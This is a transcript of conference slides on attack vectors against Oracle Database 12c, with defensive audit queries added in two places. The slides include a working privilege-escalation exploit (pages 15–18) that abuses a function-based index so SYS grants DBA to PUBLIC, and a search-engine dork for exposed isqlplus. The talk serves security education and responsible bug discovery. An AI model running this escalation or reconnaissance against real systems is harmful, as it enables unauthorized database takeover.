Oracle database 12c attack vectors Martin Toshev, BGOUG, 04.06.2016

Oracle Database 12c Attack Vectors

Jan 09, 2017


Martin Toshev
Transcript
Page 1: Oracle Database 12c Attack Vectors

Oracle database 12c attack vectors

Martin Toshev,BGOUG, 04.06.2016

Page 2: Oracle Database 12c Attack Vectors

Who am I

Software consultant (CoffeeCupConsulting)

BG JUG board member (http://jug.bg)

OpenJDK and Oracle RDBMS enthusiast

Page 3: Oracle Database 12c Attack Vectors

Who am I

Author of Learning RabbitMQ

Page 4: Oracle Database 12c Attack Vectors

Agenda

• Real world examples

• Attack vectors

• Attack discovery approach

• Tools

Page 5: Oracle Database 12c Attack Vectors

Real world examples

Page 7: Oracle Database 12c Attack Vectors

Real world examples

However …

Page 8: Oracle Database 12c Attack Vectors

Real world examples

Source: http://www.cnet.com/news/oracle-databases-easy-to-hack-says-researcher/

"Disable the protocol in Version 11.1 and start using older versions like Version 10g," which is not vulnerable

they didn't fix the current version, which leaves 11.1 and 11.2 still susceptible to attacks

Page 9: Oracle Database 12c Attack Vectors

Real world examples

Source: http://www.joxeankoret.com/download/tnspoison.pdf/

Page 10: Oracle Database 12c Attack Vectors

Real world examples

Source: http://www.itsec.gov.cn/webportal/download/2005_Search_Engine_Attack_Database.pdf

Simple example:

1) https://www.google.ca/advanced_search

2) search for '/isqlplus' and specify 'URL only'

3) voila

Page 11: Oracle Database 12c Attack Vectors

Real world examples

Source: http://thehackernews.com/2014/08/Vulnerability-Oracle-Data-Redaction-Security.html

Page 12: Oracle Database 12c Attack Vectors

Real world examples

Source: http://www.reuters.com/article/us-oracle-hackers-idUSTRE56L66D20090722 http://www.theinquirer.net/inquirer/news/1469225/oracle-databases-hacked-script-kiddies

Page 13: Oracle Database 12c Attack Vectors

Real world examples

Source: http://www.dba-oracle.com/t_hackers_breaches_horror_stories.htm

Page 14: Oracle Database 12c Attack Vectors

Real world examples

Source: http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf

Page 15: Oracle Database 12c Attack Vectors

Real world examples

• Privilege escalation via indexes in 12c:

-- from SYS: create the low-privileged c##autoexec user
CREATE USER c##autoexec IDENTIFIED BY 123;
GRANT CREATE SESSION TO c##autoexec;
GRANT CREATE PROCEDURE TO c##autoexec;
ALTER USER c##autoexec QUOTA 100M ON USERS;

-- from SYS: a table owned by SYS that the user may index and read/write
CREATE TABLE foo (id INT);
INSERT INTO sys.foo VALUES (100);
INSERT INTO sys.foo VALUES (50);

GRANT INDEX ON foo TO c##autoexec;
GRANT SELECT, INSERT ON foo TO c##autoexec;

Page 16: Oracle Database 12c Attack Vectors

Real world examples

• Privilege escalation via indexes in 12c:

-- from c##autoexec: attempt to set the DBA role - FAILS
SET ROLE DBA;

Page 17: Oracle Database 12c Attack Vectors

Real world examples

• Privilege escalation via indexes in 12c:

-- from c##autoexec: invoker-rights function that grants DBA to PUBLIC
-- when it is executed by a sufficiently privileged caller
CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR
  DETERMINISTIC AUTHID CURRENT_USER
IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';
  COMMIT;
  RETURN 'FOO';
END;
/

Page 18: Oracle Database 12c Attack Vectors

Real world examples

• Privilege escalation via indexes in 12c:

-- from c##autoexec: make the function callable by everyone and
-- use it in a function-based index on the SYS-owned table
GRANT EXECUTE ON GETDBA TO PUBLIC;

CREATE INDEX EXPLOIT_INDEX ON SYS.FOO(C##AUTOEXEC.GETDBA(''));

-- from SYSDBA: touching the indexed table evaluates GETDBA with SYS privileges
SELECT * FROM sys.foo;

-- from c##autoexec: SUCCESS
SET ROLE DBA;
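A defender's check for the pattern just shown, added here and not part of the slides: a PL/SQL block that lists function-based indexes on SYS/SYSTEM tables whose expression calls a function from another schema, followed by every INDEX privilege granted on a table to a non-system account. The DBA_* views and their columns are Oracle's; the SYS/SYSTEM filter, the regular expression and the output format are assumptions.

```sql
-- Added example (not from the slides). Run as an account with SELECT on DBA_* views.
SET SERVEROUTPUT ON
DECLARE
  v_expr  VARCHAR2(4000);  -- COLUMN_EXPRESSION is a LONG; PL/SQL can fetch it into VARCHAR2
  v_owner VARCHAR2(128);
BEGIN
  -- 1. function-based indexes on SYS/SYSTEM tables that call a foreign-schema function
  FOR r IN (
    SELECT i.index_owner, i.index_name, i.table_owner, i.table_name, i.column_expression
      FROM dba_ind_expressions i
      JOIN dba_indexes x
        ON x.owner = i.index_owner AND x.index_name = i.index_name
     WHERE x.index_type LIKE 'FUNCTION-BASED%'
       AND i.table_owner IN ('SYS', 'SYSTEM')   -- assumed scope; widen as needed
  ) LOOP
    v_expr := r.column_expression;
    -- Oracle stores the call qualified, e.g. "C##AUTOEXEC"."GETDBA"(''); take the schema part
    v_owner := REGEXP_SUBSTR(v_expr, '"([^"]+)"\."[^"]+"\s*\(', 1, 1, NULL, 1);
    IF v_owner IS NOT NULL AND v_owner <> r.table_owner THEN
      DBMS_OUTPUT.PUT_LINE('SUSPECT INDEX: ' || r.index_owner || '.' || r.index_name ||
                           ' on ' || r.table_owner || '.' || r.table_name ||
                           ' calls schema ' || v_owner || ': ' || v_expr);
    END IF;
  END LOOP;

  -- 2. the INDEX object privilege is the prerequisite for the escalation; list who holds it
  FOR g IN (
    SELECT grantee, owner, table_name, grantor
      FROM dba_tab_privs
     WHERE privilege = 'INDEX'
       AND grantee NOT IN ('SYS', 'SYSTEM')
  ) LOOP
    DBMS_OUTPUT.PUT_LINE('INDEX GRANT: ' || g.grantee || ' on ' || g.owner || '.' ||
                         g.table_name || ' (granted by ' || g.grantor || ')');
  END LOOP;
END;
/
```

Against the slides' setup the first loop reports EXPLOIT_INDEX on SYS.FOO calling schema C##AUTOEXEC, and the second reports the INDEX grant to C##AUTOEXEC that made it possible.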

Page 19: Oracle Database 12c Attack Vectors

Attack vectors

Page 20: Oracle Database 12c Attack Vectors

Attack vectors

• Let’s have a look at the high level architecture of the database …

Page 21: Oracle Database 12c Attack Vectors

Attack vectors

[Diagram: high-level database architecture with the access levels used in the following slides: unauthorized, authorized (limited permissions), authorized (SYSDBA), OS level]

Page 22: Oracle Database 12c Attack Vectors

Attack vectors

• Attack vectors can originate from different sources depending on the setup (we will abstract away from this criterion):

– external (applications running publicly, vulnerable protocols running on the database servers, malware enabling machine access)

– internal (employees with non-dba access, DBAs, OS-level users)

Page 23: Oracle Database 12c Attack Vectors

Attack vectors

• Attacks from unauthorized users:

– reconnaissance:

• looking for application servers and database tools running on the database publicly

• using search engines to find Oracle directory indices, web apps (such as isqlplus) running publicly

• port scanning for well known ports (such as 1521 for the TNS listener) on target machines

Page 24: Oracle Database 12c Attack Vectors

Attack vectors

• Attacks from unauthorized users:

– gaining access:

• exploiting misconfiguration – using default credentials

• exploiting lack of an identity policy – password brute forcing

• exploiting security bugs (e.g. a buffer overflow enabling arbitrary command execution on the TNS listener)
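Two of the "gaining access" weaknesses above can be checked from inside the database. The queries below are added here and are not from the slides; DBA_USERS_WITH_DEFPWD, DBA_USERS and DBA_PROFILES are Oracle's views, while the choice of which profile limits count as weak is an assumption.

```sql
-- Added example (not from the slides). Run as a DBA account.

-- 1. Open accounts still holding a well-known default password
SELECT d.username, u.account_status, u.profile
  FROM dba_users_with_defpwd d
  JOIN dba_users u ON u.username = d.username
 WHERE u.account_status NOT LIKE '%LOCKED%'
 ORDER BY d.username;

-- 2. Password limits that leave brute forcing unhindered: unlimited failed logins,
--    no lockout time, or no complexity function. A limit of DEFAULT inherits from
--    the DEFAULT profile, so check that profile's own rows as well.
SELECT profile, resource_name, limit
  FROM dba_profiles
 WHERE resource_type = 'PASSWORD'
   AND (   (resource_name = 'FAILED_LOGIN_ATTEMPTS'    AND limit = 'UNLIMITED')
        OR (resource_name = 'PASSWORD_LOCK_TIME'       AND limit = 'UNLIMITED')
        OR (resource_name = 'PASSWORD_VERIFY_FUNCTION' AND limit = 'NULL'))
 ORDER BY profile, resource_name;

-- 3. Open accounts assigned to a profile with no password verify function
SELECT u.username, u.profile
  FROM dba_users u
 WHERE u.account_status = 'OPEN'
   AND u.profile IN (SELECT profile
                       FROM dba_profiles
                      WHERE resource_name = 'PASSWORD_VERIFY_FUNCTION'
                        AND limit = 'NULL')
 ORDER BY u.username;
```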

Page 25: Oracle Database 12c Attack Vectors

Attack vectors

• Attacks from unauthorized users:

– data theft:

• exploiting lack of encryption, leading to man-in-the-middle attacks (e.g. TNS listener poisoning or eavesdropping)

– DoS/DDoS attacks:

• network level DoS (e.g. excessive packets)

• buffer overflow DoS (e.g. a bug in the TNS listener)

Page 26: Oracle Database 12c Attack Vectors

Attack vectors

• Attacks from authorized users with limited permissions:

– SQL injection (typically caused by buggy applications having a DB user with excessive privileges)

– DoS attacks (e.g. due to misconfiguration – excessive connections, filling shared tablespaces, running complex queries)

Page 27: Oracle Database 12c Attack Vectors

Attack vectors

• Attacks from authorized users with limited permissions:

– privilege escalation (e.g. via the INDEX permission)

– data theft (e.g. via PL/SQL procedure injection, or scheduled jobs that open remote socket connections to external hosts)

Page 28: Oracle Database 12c Attack Vectors

Attack vectors

• SYSDBA access … the world is yours

• OS level access – many methods to retrieve passwords and useful data from raw Oracle database files

Page 29: Oracle Database 12c Attack Vectors

Attack discovery approach

Page 30: Oracle Database 12c Attack Vectors

Attack discovery approach

• Already uncovered security bugs, such as the ones we discussed, are fixed by Oracle and released as Critical Patch Updates

• But how can we uncover new bugs and report them responsibly before attackers discover them?

Page 31: Oracle Database 12c Attack Vectors

Attack discovery approach

• Explore new features (e.g. multitenancy)

• See what parts of the security architecture of the database are in use by these features

• Explore changes to the security architecture and new security features

Page 32: Oracle Database 12c Attack Vectors

Attack discovery approach

• For top 12c new features (at a glance):

– consolidation (pluggable databases)

– redaction policy

Page 33: Oracle Database 12c Attack Vectors

Attack discovery approach

• For top 12c new features (at a glance):

– consolidation (pluggable databases) – resource utilization of PDBs, access boundary between PDBs, secure data replication between PDBs, discrepancies between local and common users/roles?

– redaction policy – other built-in functions/mechanisms that can reveal redacted data? (we already saw some)

Page 34: Oracle Database 12c Attack Vectors

Attack discovery approach

• For top 12c new features (at a glance):

– In-line PL/SQL functions in SQL queries

– Online Migration of Table Partition or Sub Partition

Page 35: Oracle Database 12c Attack Vectors

Attack discovery approach

• For top 12c new features (at a glance):

– In-line PL/SQL functions in SQL queries – bypassing security mechanisms, privilege escalation?

– Online Migration of Table Partition or Sub Partition – data theft?

Page 36: Oracle Database 12c Attack Vectors

Attack discovery approach

• For top 12c new features (at a glance):

– Full Database Caching

– SQL translation framework

Page 37: Oracle Database 12c Attack Vectors

Attack discovery approach

• For top 12c new features (at a glance):

– Full Database Caching – buffer overflows, DoS, malicious in-memory data manipulation?

– SQL translation framework – malicious third-party translation plug-ins, security bugs in translation plug-ins?

Page 38: Oracle Database 12c Attack Vectors

Attack discovery approach

• explore existing attacks and security bugs (e.g. use packet crafting tools to try buffer overflow attacks over enhancements of database protocols)

• explore vulnerability databases such as CVE for exploits and try to adapt some of them to new database features

Page 39: Oracle Database 12c Attack Vectors

Attack discovery approach

• make use of proper penetration testing tools such as Metasploit to adapt existing attacks for 10g/11g or older versions to 12c

• analyze new PL/SQL packages for security leaks

• disassemble Oracle binaries

Page 40: Oracle Database 12c Attack Vectors

Attack discovery approach

• You may, of course, discover issues not introduced in 12c but rather propagating through multiple versions (such as the TNS poison vulnerability) …

Page 41: Oracle Database 12c Attack Vectors

Tools

Page 42: Oracle Database 12c Attack Vectors

Tools

• nmap

• Metasploit

• Tnscmd

• ODAT (Oracle Database Attacking Tool)

• w32dasm / IDA Freeware

• Kali Linux

Page 43: Oracle Database 12c Attack Vectors

Tools

• ODAT supports 12.1.0.2.0:

– try to find valid SIDs and credentials

– try to escalate valid account to DBA or SYSDBA

– try to execute OS commands from a valid account

Page 44: Oracle Database 12c Attack Vectors

Some readings that may bring ideas …

Page 45: Oracle Database 12c Attack Vectors

Some readings that may bring ideas …

Page 46: Oracle Database 12c Attack Vectors

Thank you!

Q&A

Page 47: Oracle Database 12c Attack Vectors

References

Oracle 12c Security whitepaper
http://www.oracle.com/technetwork/database/security/security-compliance-wp-12c-1896112.pdf

Oracle Database 12c architecture overview
https://www.youtube.com/watch?v=266ay9N6kAw

Oracle Database 12c New Security Features
http://www.trivadis.com/sites/default/files/downloads/soe_oracle_database_12_new_security_features_summary.pdf

Page 48: Oracle Database 12c Attack Vectors

References

Oracle Database 12c security
http://docs.oracle.com/database/121/nav/portal_25.htm

Oracle database security checklist
http://www.isaca.org/groups/professional-english/oracle-database/groupdocuments/twp-security-checklist-database-1-132870.pdf

Encryption and Redaction in Oracle Database 12c with Oracle Advanced Security
http://www.oracle.com/technetwork/database/options/advanced-security/advanced-security-wp-12c-1896139.pdf

Page 49: Oracle Database 12c Attack Vectors

References

Privilege escalation via Oracle indexes
http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf

Attacking Oracle with the Metasploit Framework
http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf

Oracle Database TNS Listener Poison Attack
http://www.joxeankoret.com/download/tnspoison.pdf

Page 50: Oracle Database 12c Attack Vectors

References

ODAT (Oracle Database Attacking Tool)
https://github.com/quentinhardy/odat

Oracle Database 12c CVE vulnerability statistics
https://www.cvedetails.com/product/467/Oracle-Database-Server.html?vendor_id=93

Oracle Database 12c CVE vulnerabilities
https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-467/cvssscoremin-5/cvssscoremax-5.99/Oracle-Database-Server.html